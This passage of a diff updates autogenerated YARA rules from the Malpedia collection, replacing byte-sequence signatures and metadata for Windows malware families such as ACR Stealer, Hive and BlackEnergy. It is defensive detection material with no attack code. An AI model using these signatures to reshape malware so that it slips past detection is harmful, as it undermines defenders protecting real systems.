@@ -92120,71 +92481,77 @@ rule MALPEDIA_Win_Doublefinger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb70401 83f82f 750e 488b442430 4883c002 4889442430 }
-		$sequence_1 = { 33c0 488705???????? 48833d????????00 742a 488d0d9f540000 e8???????? 85c0 }
-		$sequence_2 = { 486bc005 c64404588c b801000000 486bc006 c6440458ee }
-		$sequence_3 = { 90 ff15???????? 8bc8 4c8d4c2460 4c8d442458 488d542450 e8???????? }
-		$sequence_4 = { 4863442404 8b4c2404 8b1424 03d1 8bca 034c2408 8bc9 }
-		$sequence_5 = { 488b442428 4889442430 83bc24f000000000 7512 837c242000 750b 488b442430 }
-		$sequence_6 = { 48894c2408 4881ec78030000 488b842488030000 480564010000 4889442428 c744242000000000 eb0a }
-		$sequence_7 = { e8???????? 33d2 48c7c1ffffffff ff9424b0000000 }
-		$sequence_8 = { c7042400000000 8b0424 488b4c2420 0fb70441 85c0 }
-		$sequence_9 = { ff9424c0000000 4889842480010000 b875000000 6689842400010000 b872000000 }
+		$sequence_0 = { 8d45e8 b102 e8???????? 8d55e8 8d45dc e8???????? 8b45dc }
+		$sequence_1 = { 03d8 8d45f8 50 8b45f8 e8???????? }
+		$sequence_2 = { 57 55 bb???????? be???????? bf???????? 807b2800 }
+		$sequence_3 = { e8???????? 33c0 55 68???????? 64ff30 648920 8d859cfdffff }
+		$sequence_4 = { 2bc3 2bc7 8bf8 85ff 7d02 }
+		$sequence_5 = { 8d145f 8b442404 e8???????? 8b0424 8bd7 e8???????? }
+		$sequence_6 = { 8d8570fdffff e8???????? 8d8574fdffff ba02000000 }
+		$sequence_7 = { 8d8584fdffff ba04000000 e8???????? 8b8584fdffff }
+		$sequence_8 = { 7506 ff05???????? 56 e8???????? }
+		$sequence_9 = { 53 e8???????? 59 56 e8???????? 59 8bc7 }
+		$sequence_10 = { e8???????? 59 8b45f4 40 }
+		$sequence_11 = { 50 e8???????? 59 8bd8 33c0 }
+		$sequence_12 = { 85db 7404 8bc3 eb07 }
+		$sequence_13 = { 011f 59 8bc3 c1e003 01866caf0100 }
+		$sequence_14 = { 014f18 8b4714 85c0 0f854e010000 }
+		$sequence_15 = { 014110 5f 5e 5b }
 
 	condition:
-		7 of them and filesize < 115712
+		7 of them and filesize < 1753088
 }
-rule MALPEDIA_Win_Unidentified_102_Auto : FILE
+rule MALPEDIA_Win_Tildeb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68f5ede2-e772-5b9c-86c7-72da7d6ddaff"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_102_auto.yar#L1-L130"
+		id = "49677524-14e6-56de-966e-12587dbc120c"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tildeb_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "7cf959abf8b06a75a101a66334f27ae5601df812c1ddb140fd9298ef735bb0dc"
+		logic_hash = "ff05557691123d6857c3cb5d609bf2746dd344811b380372ecacb54f0277a087"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bd238 8b0c8d187b0410 88441129 8b0b 8bc1 c1f806 }
-		$sequence_1 = { 83c408 8bb5e8fdffff 8dbdd8fdffff 83bdecfdffff10 c745b000000000 0f43bdd8fdffff }
-		$sequence_2 = { 8bf3 6bf938 c1fe06 6a00 8b0cb5187b0410 ff740f24 }
-		$sequence_3 = { 894610 c7461407000000 668906 e9???????? 837f1410 8bcf 7202 }
-		$sequence_4 = { c785e4fbffff07000000 8d5102 668985d0fbffff 6690 668b01 83c102 6685c0 }
-		$sequence_5 = { 8d85e8e7ffff 68???????? 50 ff15???????? 83c410 8d8594e7ffff 50 }
-		$sequence_6 = { 0f1085b0fcffff 0f1100 8bc4 0f108590fcffff 51 0f1100 ff5228 }
-		$sequence_7 = { 83c408 8b95dcfeffff 83fa10 722f 8b8dc8feffff 42 8bc1 }
-		$sequence_8 = { 6a00 68???????? 6802000080 c785c8e7ffff3f000f00 ff15???????? 85c0 0f84ef000000 }
-		$sequence_9 = { 8d45f4 64a300000000 8965f0 8b4510 8b4d18 8b5d0c }
+		$sequence_0 = { 83c404 51 ffd3 f6460c10 74a3 5d 8b5c2410 }
+		$sequence_1 = { 51 52 50 56 ffd7 8b542414 8b1d???????? }
+		$sequence_2 = { 5e 81c494010000 c3 b808000000 5e }
+		$sequence_3 = { 56 57 8965e8 6a40 ff15???????? 50 ff15???????? }
+		$sequence_4 = { 8b0d???????? 51 ff15???????? e9???????? 6a00 6a02 68???????? }
+		$sequence_5 = { 33dd 8bac24b4000000 33dd 8bac24ac000000 33dd 8bac24d0000000 }
+		$sequence_6 = { 8b442414 c6400101 8b442410 85c0 744b }
+		$sequence_7 = { 0bd9 8b8c24ac000000 33ea 03cb 33ef 03e9 }
+		$sequence_8 = { 5b c3 8b3d???????? 6a02 53 56 ffd7 }
+		$sequence_9 = { bf???????? f3ab 8d85e4f9ffff 50 8b8ddbf5ffff 81e1ff000000 51 }
 
 	condition:
-		7 of them and filesize < 626688
+		7 of them and filesize < 8532488
 }
-rule MALPEDIA_Win_Elirks_Auto : FILE
+rule MALPEDIA_Win_Hacksfase_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2f83629f-d917-5544-9557-f1c734a140a5"
+		id = "e8964081-a2ab-5f17-84d6-f60be8a25bb6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.elirks_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hacksfase_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "23afc2f901e3fd2aa39a45f20d3907f7b1b87b547d67ae2e0da6482231d3ff66"
+		logic_hash = "e471c3c94524d0ea367845eb4bddab6e1e071bddbe6451c868738ead26f24319"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92198,32 +92565,32 @@ rule MALPEDIA_Win_Elirks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7532 ff15???????? 8b4b08 81e1ffffff00 }
-		$sequence_1 = { 83c40c 03d5 8bfd 8916 8b4c2410 8d442418 }
-		$sequence_2 = { 8b4c2408 8d742410 e8???????? 8d742408 e8???????? 5f 5e }
-		$sequence_3 = { 33c0 8bd6 8a0a 80f941 7c0d 80f95a 7f08 }
-		$sequence_4 = { 8d4b01 394c2414 0f8c4bffffff b801000000 5f 5e 5d }
-		$sequence_5 = { 758d 8b4c241c 5b 85c9 7e1d }
-		$sequence_6 = { e8???????? 83c410 85c0 7419 8b44241c 8b4c2418 e8???????? }
-		$sequence_7 = { 56 57 57 b8???????? e8???????? 83c40c 8bc6 }
-		$sequence_8 = { 8db348010000 7411 8b4604 83c001 99 b903000000 }
-		$sequence_9 = { 0f8423ffffff 8b8604600000 50 ffd5 }
+		$sequence_0 = { 5e c9 c20400 b8???????? e8???????? 83ec40 }
+		$sequence_1 = { 895dd0 ff5064 3bc3 894508 7d5d 3d17030980 7456 }
+		$sequence_2 = { ff15???????? 83c418 5f 5e 81c434010000 }
+		$sequence_3 = { 8bfe f3ab 8d7e40 6a04 68???????? 57 }
+		$sequence_4 = { 50 e8???????? ff15???????? 834dfcff 59 8d4d94 e8???????? }
+		$sequence_5 = { c20400 56 8bf1 807e1c00 740d 8b460c }
+		$sequence_6 = { 8945e8 59 3bc3 c645fc03 7422 53 8d450b }
+		$sequence_7 = { 0bc6 85d2 7502 0c04 6a00 50 ff15???????? }
+		$sequence_8 = { 57 8bd9 6a02 5f 8d4dd4 }
+		$sequence_9 = { 5e 5b 5d c20c00 ff25???????? ff25???????? 56 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Pushdo_Auto : FILE
+rule MALPEDIA_Win_Redcurl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b6d886fe-4960-5326-a389-c445ba8e11b5"
+		id = "fbb544b7-c5e6-54a1-8421-fdb6aeb04e0b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pushdo_auto.yar#L1-L204"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redcurl_auto.yar#L1-L212"
 		license_url = "N/A"
-		logic_hash = "31b4c4806bd17184721cedae96bf0c20e18e459a29e411d56b72098b9cc5e475"
+		logic_hash = "69ca0c8cf976224bed2624627972f08d1882150471e8a73b5314d8faac0d77d8"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -92237,43 +92604,43 @@ rule MALPEDIA_Win_Pushdo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? 33d2 b9ffff0000 }
-		$sequence_1 = { f7f9 33c9 ba88020000 f7e2 0f90c1 f7d9 }
-		$sequence_2 = { 8b45fc b10b d3c0 61 }
-		$sequence_3 = { 2bd0 8b4df8 83c101 894df8 81faff000000 }
-		$sequence_4 = { 0fbe8c0df0feffff 33d1 8b450c 0345fc }
-		$sequence_5 = { 6800010000 6a00 8d85f0feffff 50 e8???????? 83c40c 8d8df0feffff }
-		$sequence_6 = { 888c15f0feffff 8b55fc 8a85effeffff 888415f0feffff eb84 c785e8feffff00000000 }
-		$sequence_7 = { 8d8df0feffff 894df8 c685effeffff00 8b55f8 8d85f0feffff 2bd0 }
-		$sequence_8 = { 50 53 889dfcfeffff ff15???????? 48 3d02010000 7719 }
-		$sequence_9 = { 8d8588f8ffff 52 68???????? 50 ff15???????? }
-		$sequence_10 = { 5b ff75fc ff15???????? 5e 8b45f8 5f }
-		$sequence_11 = { 8b1d???????? ff7634 ff75ec ffd3 8945e8 3bc7 }
-		$sequence_12 = { 7d02 33ff 8b45f0 c1e006 }
-		$sequence_13 = { 52 8d8588fbffff 50 e8???????? }
-		$sequence_14 = { 8b5508 0fb7444a02 85c0 750b }
-		$sequence_15 = { 6a20 8d55b8 52 6a00 }
-		$sequence_16 = { 8bec 8b4508 83781800 7408 8b4d08 8b4118 }
-		$sequence_17 = { c745ec00000000 837de400 0f8e06010000 8b550c 0fbe02 }
-		$sequence_18 = { 8945d0 8b4dd0 51 ff55e8 }
-		$sequence_19 = { 894dfc eb83 8b5508 8b02 8945f4 }
-		$sequence_20 = { 2b45fc 83f805 7307 33c0 e9???????? }
+		$sequence_0 = { 99 b91a000000 f7f9 80c261 88143e 47 }
+		$sequence_1 = { 2bc6 48 50 56 }
+		$sequence_2 = { c745f000000000 ff15???????? 8bd0 c7461000000000 8bca c746140f000000 c60600 }
+		$sequence_3 = { 3bc2 0f42d0 0fb6041a 03d3 }
+		$sequence_4 = { 7541 d9ec d9c9 d9f1 833d????????00 0f856c090000 }
+		$sequence_5 = { 8bca c746140f000000 c60600 8d7901 0f1f440000 8a01 41 }
+		$sequence_6 = { c745fc00000000 c745c400000000 c745c80f000000 c645b400 }
+		$sequence_7 = { e8???????? 8d0c3e 83c40c 3bf1 }
+		$sequence_8 = { 51 e8???????? 83c408 85f6 7430 }
+		$sequence_9 = { c645d800 8d5001 8b4610 3bc2 726f 2bc2 83c9ff }
+		$sequence_10 = { 6a00 6aff 8bf8 6a00 }
+		$sequence_11 = { 51 03c2 8d4dd8 50 e8???????? 8d45d8 8bce }
+		$sequence_12 = { 0f57c0 c745e800000000 68???????? ba???????? 660fd645e0 e8???????? 83c404 }
+		$sequence_13 = { 89742404 893c24 e8???????? 85c0 0f85cdfeffff }
+		$sequence_14 = { 85c0 0f84c4000000 8b8d00ffffff 8945d0 }
+		$sequence_15 = { 89b548feffff 8b08 39d1 0f842f180000 }
+		$sequence_16 = { 7535 8938 83c41c 31c0 5b 5e }
+		$sequence_17 = { 83ec1c 8b31 8b7c2430 8b442434 8b5ef4 39df }
+		$sequence_18 = { 83fe0f 0f87f20e0000 83fe01 0f85150d0000 0fb617 889530ffffff }
+		$sequence_19 = { 895c2408 890424 89542404 e8???????? 8b5da8 }
+		$sequence_20 = { 0f8583f7ffff 8b4004 85c0 75e3 8b8310010000 8d5608 89442424 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 487424
 }
-rule MALPEDIA_Win_Alice_Atm_Auto : FILE
+rule MALPEDIA_Win_Acr_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "501a026b-dba7-501a-810b-0b737ec59325"
+		id = "27adbb62-681d-5315-be14-68aa5c14abca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.alice_atm_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acr_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acr_stealer_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "d552c74f415e09d46d22c314024829e6b9aa2356b6f2a8ec27602ddc27a1083f"
+		logic_hash = "885dd5a2520c2a460bba6eeb3147670a114466803568b2f029aa5eef95499efd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92287,32 +92654,32 @@ rule MALPEDIA_Win_Alice_Atm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4b 75d4 ff75f8 e8???????? }
-		$sequence_1 = { 56 57 33ff 57 e8???????? a3???????? 6a03 }
-		$sequence_2 = { 6a40 e8???????? 0bc0 7434 8945fc 8bf8 }
-		$sequence_3 = { 83c604 33ff 47 3b7d0c 741b ff36 57 }
-		$sequence_4 = { ff7508 51 ff35???????? 68???????? ff15???????? 0bc0 743f }
-		$sequence_5 = { 0fb7c0 8945f8 8b7d10 83ff00 }
-		$sequence_6 = { ff15???????? 0bc0 742a 8bd8 833d????????00 740b }
-		$sequence_7 = { 897dfc 8d45f8 50 6a00 ff7508 e8???????? }
-		$sequence_8 = { e9???????? 817d0c11010000 0f85ed000000 8b4d10 }
-		$sequence_9 = { 817e0c20202000 0f8480000000 ff36 68???????? 8d45f8 }
+		$sequence_0 = { 037e78 b900000000 6a1e 134e7c 52 51 898ea4000000 }
+		$sequence_1 = { 6a16 88850affffff 8d85f8feffff 50 ff7704 888d08ffffff }
+		$sequence_2 = { 8955e8 33c0 0fa4c803 53 c1e103 }
+		$sequence_3 = { e8???????? 8b55cc 0430 8b4de4 2375ac ff45f8 88040a }
+		$sequence_4 = { 81ff???????? 750a e8???????? 83c404 eb12 6a01 }
+		$sequence_5 = { c786c400000000000000 3bf9 8d96b0000000 1bc9 }
+		$sequence_6 = { c3 5f 5e b84f40902f ba3b6ae19a 5b 8be5 }
+		$sequence_7 = { 3a4101 751a 83fefe 7433 8a4202 3a4102 750d }
+		$sequence_8 = { 0f42f8 897a48 0fb74e1c 0fb7461e 03ce 83c02e }
+		$sequence_9 = { 79e9 8b55f8 41 03c1 2bf9 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 1246208
 }
-rule MALPEDIA_Win_Regretlocker_Auto : FILE
+rule MALPEDIA_Win_Kwampirs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9ec355a-0ebd-5eae-9855-3c394e286080"
+		id = "0c831c38-f3af-5c4b-940a-effdace44ac1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.regretlocker_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kwampirs_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "f3fb26e7f48e7fc6e56408b23120104bca26438c533527ef9b1632b5882b6ef9"
+		logic_hash = "05da0209b4ac4234af04c94a25b568ea854e2af3b982527383637ef20b197483"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92326,34 +92693,34 @@ rule MALPEDIA_Win_Regretlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bc7 8d8dbcfeffff 2b45e8 53 50 }
-		$sequence_1 = { e8???????? 50 c645fc0d e8???????? 83c410 8d8d50ffffff e8???????? }
-		$sequence_2 = { e9???????? 8d4701 50 e8???????? 8bf0 33c0 57 }
-		$sequence_3 = { 8b4704 83c40c 8bde 3bf0 7418 6a6c 8bf8 }
-		$sequence_4 = { 50 e8???????? c745ec03000000 8b4d18 8d45f3 50 8d45d4 }
-		$sequence_5 = { 66394604 7505 8d4606 eb3f 6a5c 5a 83ff03 }
-		$sequence_6 = { 6a40 ff7508 8b7850 8b7054 8b5858 8945fc 8d45b0 }
-		$sequence_7 = { 8945e0 8d0c38 8d4118 895110 894508 895114 e8???????? }
-		$sequence_8 = { 84c0 75f9 ff7510 2bce 51 52 ff7508 }
-		$sequence_9 = { 8b5508 56 8bf1 8b02 894610 8b4224 894614 }
+		$sequence_0 = { 51 e8???????? 83c404 a3???????? 33f6 }
+		$sequence_1 = { 83c418 85c0 7512 8b07 }
+		$sequence_2 = { 7512 8b07 50 e8???????? 83c404 891f }
+		$sequence_3 = { f7d9 0bc8 51 e8???????? 83c404 a3???????? 33f6 }
+		$sequence_4 = { e8???????? 83c404 8a45e7 8b4df0 64890d00000000 }
+		$sequence_5 = { 33c5 50 8d45f0 64a300000000 8965e8 8bf9 33db }
+		$sequence_6 = { 668955f4 33d2 668955f6 e8???????? }
+		$sequence_7 = { 8d45f0 64a300000000 8965e8 8bf9 33db }
+		$sequence_8 = { 6a01 56 8b0f 51 e8???????? 83c418 }
+		$sequence_9 = { 56 8b0f 51 e8???????? 83c418 85c0 }
 
 	condition:
-		7 of them and filesize < 1021952
+		7 of them and filesize < 2695168
 }
-rule MALPEDIA_Win_Hyperssl_Auto : FILE
+rule MALPEDIA_Win_Flashflood_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "278628e2-0cb8-5fcf-b0b4-758a4cb29c23"
+		id = "8a274825-f4c9-5f62-b907-dfc89a45069c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hyperssl_auto.yar#L1-L205"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flashflood_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "11f6d7199b100b059f11030323327bd2335a327a45ce3c310d198ef4e514bf67"
+		logic_hash = "683f799d9771d2f1f092dca2666088c76c32113ac36ef3235bcc1b22e7e80191"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -92365,47 +92732,34 @@ rule MALPEDIA_Win_Hyperssl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0108 3310 c1c607 c1c210 }
-		$sequence_1 = { 8b4028 03c1 7423 56 57 b9???????? }
-		$sequence_2 = { 0105???????? 8d558c 89458c 894590 }
-		$sequence_3 = { 33c9 2402 3c02 0f94c1 8d0ccd05000000 8d040f 50 }
-		$sequence_4 = { 0101 0100 0100 0100 }
-		$sequence_5 = { 0100 0200 0200 0002 0002 }
-		$sequence_6 = { 0108 3908 1bc9 f7d9 }
-		$sequence_7 = { 0101 014514 2bf3 8b5d0c }
-		$sequence_8 = { 0105???????? 8d8d5cffffff 89855cffffff 898560ffffff }
-		$sequence_9 = { 5f 8a10 301401 8a10 }
-		$sequence_10 = { 8a10 301406 40 4f 75f2 }
-		$sequence_11 = { 2bc8 2bf0 5f 8a10 }
-		$sequence_12 = { 40 5d c20c00 6a08 68???????? }
-		$sequence_13 = { 8bc8 85c9 7436 8b413c 03c1 }
-		$sequence_14 = { 03c1 742a 8b4028 03c1 }
-		$sequence_15 = { 011d???????? 5f 8935???????? 5e }
-		$sequence_16 = { 017e08 50 e8???????? ff0d???????? }
-		$sequence_17 = { 017e0c 5f 8bc6 5e c20800 }
-		$sequence_18 = { 017e08 8bc3 e8???????? c20400 }
-		$sequence_19 = { 017e0c 8d4d08 e8???????? 5f }
-		$sequence_20 = { 01442428 8b442428 884500 45 }
-		$sequence_21 = { 017e0c 395e10 740f ff7610 }
-		$sequence_22 = { 016b08 897b04 5f 5e }
+		$sequence_0 = { e8???????? 8b35???????? 8d85f0fdffff 6a2e 50 ffd6 }
+		$sequence_1 = { 50 ff5118 8b45f0 8b4dcc 8345e00c 3b08 }
+		$sequence_2 = { 83c428 6a00 6840420f00 ff75dc ff75d8 e8???????? }
+		$sequence_3 = { c3 33d2 39542408 7e24 53 8b442408 8d0c02 }
+		$sequence_4 = { c3 55 8bec 81ece8050000 8365fc00 6a00 e8???????? }
+		$sequence_5 = { 0fb745e4 50 8d8518fdffff 68???????? 50 ffd6 }
+		$sequence_6 = { 50 e8???????? 8d85f0fdffff 50 e8???????? 8bf0 83c40c }
+		$sequence_7 = { 7ce0 5f 5b c9 c3 8b542404 }
+		$sequence_8 = { e8???????? 8d85fcfdffff 50 e8???????? 8d85fcfdffff 53 }
+		$sequence_9 = { 50 8d8518ffffff 6880000000 50 53 ff15???????? }
 
 	condition:
-		7 of them and filesize < 835584
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Shatteredglass_Auto : FILE
+rule MALPEDIA_Win_Hive_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5759aec-876a-5e51-92c3-b5c3cd47ebed"
+		id = "648fda14-26aa-5cb6-b0b0-33ac82fa76a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shatteredglass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shatteredglass_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hive_auto.yar#L1-L193"
 		license_url = "N/A"
-		logic_hash = "01b6c47460c5c08264d9ff26f8c68c9d17064a107dafa21abd25815194e46710"
+		logic_hash = "b786ded85189e10c8f992d72b9f33dda53290c7d2488c59423c5787b80ba3c77"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -92417,32 +92771,43 @@ rule MALPEDIA_Win_Shatteredglass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 eb3c 8b9530e5ffff 8b8528e5ffff 8b8d24e5ffff 8b0485d0d14100 f644010440 }
-		$sequence_1 = { ff15???????? 57 ff15???????? 8b4dfc 8a45e7 33cd 5f }
-		$sequence_2 = { 75f5 2bce d1f9 83f918 }
-		$sequence_3 = { 68???????? 56 ffd7 68???????? 68???????? 8d85f8feffff }
-		$sequence_4 = { 7c88 33f6 8d9b00000000 0fb70c73 }
-		$sequence_5 = { 8d4900 0fb70c77 8d41d0 6683f809 7705 }
-		$sequence_6 = { 68???????? 68???????? e8???????? 8b3d???????? 83c408 837c241001 7576 }
-		$sequence_7 = { b810000000 2bc6 50 8d8640d74100 50 57 ffd3 }
-		$sequence_8 = { 888840d74100 83fe20 7c88 8b3d???????? }
-		$sequence_9 = { 8d410d 8d642400 8a08 8a5001 8a6802 8a70ff }
+		$sequence_0 = { b807000000 b9d4000000 31d2 31db }
+		$sequence_1 = { 31c0 b9aa000000 31d2 31db }
+		$sequence_2 = { 31c0 6690 e8???????? 85c0 7569 }
+		$sequence_3 = { 7f1e 0fbae000 73ed 90 66c74424426341 66c74424400000 }
+		$sequence_4 = { 31c0 31c9 31d2 bb04000000 beb8000000 31ff }
+		$sequence_5 = { 89c2 e8???????? b801000000 e8???????? 90 }
+		$sequence_6 = { 89d1 e8???????? b802000000 e8???????? b802000000 }
+		$sequence_7 = { 31c0 31c9 31d2 bb06000000 be41000000 31ff }
+		$sequence_8 = { 31c0 e8???????? e8???????? 833d????????00 750e }
+		$sequence_9 = { 31c0 eb13 0fb654044b 0fb674041e }
+		$sequence_10 = { 81c4b0000000 c3 e8???????? 90 }
+		$sequence_11 = { 89d1 e8???????? b901000000 e8???????? }
+		$sequence_12 = { 01c1 c1e106 400fb6d6 01ca }
+		$sequence_13 = { 01c0 4000f8 0fb6c0 48898424b0000000 }
+		$sequence_14 = { 01c8 89c1 c1e91f ffc9 }
+		$sequence_15 = { 01c2 b8ffffff03 21c5 21c3 }
+		$sequence_16 = { 01c8 c1e006 400fb6cf 01c1 }
+		$sequence_17 = { 01c1 c1e106 0fb6c2 01c8 }
+		$sequence_18 = { 01c1 83c101 83f90c 0f820fffffff }
+		$sequence_19 = { 01ca c1e206 0fb6c3 01d0 }
+		$sequence_20 = { 898c2488000000 8984248c000000 83c478 c3 85db 7609 }
 
 	condition:
-		7 of them and filesize < 273408
+		7 of them and filesize < 7946240
 }
-rule MALPEDIA_Win_Safenet_Auto : FILE
+rule MALPEDIA_Win_Blackenergy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44c128f1-e37d-585a-b061-6d17f8062460"
+		id = "75f134c5-71b6-5322-a009-b31d954d7d23"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.safenet_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackenergy_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "6d1c99e82abc5d35c1a893047f41638ddfbde9bad49f347bcf5718bfe865543c"
+		logic_hash = "1873575f4ba8e3b3e090543b90afdc434ae43dfa997f5bef2241328cdcb2b4cc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92456,32 +92821,32 @@ rule MALPEDIA_Win_Safenet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837dec00 7405 ff75ec ff16 837de800 7405 }
-		$sequence_1 = { 6a01 5b 33f6 663bc6 7437 663d2200 }
-		$sequence_2 = { 8d4de8 e8???????? 6a01 8d4dd0 e8???????? eb0e e8???????? }
-		$sequence_3 = { 75dc 8901 ebf3 56 }
-		$sequence_4 = { 56 6a01 68000000c0 ff7514 ff15???????? }
-		$sequence_5 = { 397de4 0f85dc020000 ff15???????? 0fb6c8 33d2 }
-		$sequence_6 = { 754e 83602000 8b7604 e9???????? 8b4808 397920 7518 }
-		$sequence_7 = { 85c0 7509 837df801 0f94c0 8bf8 ff75fc ff15???????? }
-		$sequence_8 = { 2bd1 8d34b5d8d84000 832600 83c60c 4a }
-		$sequence_9 = { 8dbd7cffffff 59 f3ab 8b462c 33ff 3bc7 c7857cffffff24000000 }
